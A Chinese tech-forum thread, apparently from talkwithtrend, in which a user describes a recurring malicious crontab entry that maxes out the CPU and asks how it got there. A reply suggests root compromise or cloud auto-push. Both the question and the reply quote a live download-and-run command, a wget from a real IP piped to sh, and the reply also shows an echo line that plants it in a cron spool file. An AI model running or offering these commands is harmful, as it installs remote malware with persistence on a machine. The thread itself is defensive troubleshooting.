/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh
导致这台CPU100%等问题。查看/var/log/cron发现是该用户修改了cron,记录下修改时间但是用last|more查看用户登录情况没有看到该用户在该时间前后登录过系统。后来修改了用户的密码,去除了crontab中的内容,但是过几天发现crontab又被修改了。同时也没有该用户在期间有登录的信息。请问如何做到了,如何避免这种情况再次发生。团队中没有人去修改,有点像病毒一样或者被人攻击了。
root用户在谁手里?root用户什么都可以干,cron也可以通过修改/var/spool/cron下面的文件来实现。比如:echo "/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh" >> /var/spool/cron/user
你现在可以追查两点:
有可能是阿里云虚拟机集中管理的自动任务,自动推送到虚机上来的。
关于TWT使用指南社区专家合作厂商入驻社区企业招聘投诉建议版权与免责声明联系我们 © 2024talkwithtrend — talk with trend,talk with technologist京ICP备09031017号-30